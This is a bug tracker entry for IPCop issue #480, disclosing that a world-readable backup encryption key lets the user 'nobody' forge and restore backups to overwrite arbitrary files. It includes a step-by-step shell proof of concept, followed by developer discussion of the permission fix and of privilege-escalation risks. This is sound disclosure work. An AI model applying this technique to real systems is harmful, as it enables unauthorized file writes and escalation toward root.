Menu

#480 user "nobody" can write arbitrary files

closed-fixed
nobody
5
2005-11-05
2005-10-31
No

The user "nobody" can (over)write arbitrary files by
creating fake backups and restoring them.

Cause:
The key used to encrypt the backup file is world readable:

# ls -al /var/ipcop/backup/
-rw-r--r-- 1 root root 74 2005-02-05 20:30
backup.key

POC:

$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
$ cd /tmp
$ mkdir etc
$ echo hacked > etc/hacked
$ tar cvfz backup.tgz etc/
etc/
etc/hacked
$ /usr/bin/openssl des3 -e -salt -in backup.tgz
-out backup.dat -kfile /var/ipcop/backup/backup.key
$ cp backup.dat /home/httpd/html/backup/ipcop.dat
$ ls -al /etc/hacked
ls: /etc/hacked: No such file or directory
$ /usr/local/bin/ipcoprscfg --hardware
$ ls -al /etc/hacked
-rw-r--r-- 1 nobody nobody 7 2005-10-07 00:05 /etc/hacked

Bingo.

Note: I assumed, that I have a shell as user nobody for
example by exploiting a vulnerable service.
To get this I entered a valid shell for nobody in
/etc/passwd and did a "su - nobody"

FIX: Change access rights on /var/ipcop/backup/backup.key

Discussion

  • Franck Bourdonnec

    Logged In: YES
    user_id=1041094

    Ok backup.key is now '400' protected

    But I would like to know why we bother with two kind of
    sets. Encrypted and not encrypted....

     
  • Franck Bourdonnec

    • status: open --> closed-fixed
     
  • Robert Kerr

    Robert Kerr - 2005-11-01

    Logged In: YES
    user_id=317036

    Maybe you shouldn't close the bug if you ask a question? :p

    Encrypted backups can only be restored on the IPCop that
    made them (as it has the key). Unencrypted backups can only
    be restored on an IPCop that has never made a web backup
    (one that has no key). The idea being that if you have to
    rebuild your IPCop you can still get a backup onto it.

    Trouble is unencrypted web backups totaly break our security
    model. I can't see any way to do unencrypted web backup and
    restore without allowing nobody -> root privilege
    escalation. I'm not actuially convinced the encrypted
    backups are any better - without a signature on them it's
    still possible an attacker could manipulate an existing backup.

    I know gilles has been making some changes here, but I'm not
    sure they go anywhere near far enough,.

     
  • Robert Kerr

    Robert Kerr - 2005-11-01
    • status: closed-fixed --> open-fixed
     
  • Gilles Espinasse

    • status: open-fixed --> closed-fixed
     
  • Gilles Espinasse

    Logged In: YES
    user_id=691649

    Now that backup.key access is restricted to root, this point
    should be considered closed.
    Uncrypted backup is covered by another SF bug report.

     

Log in to post a comment.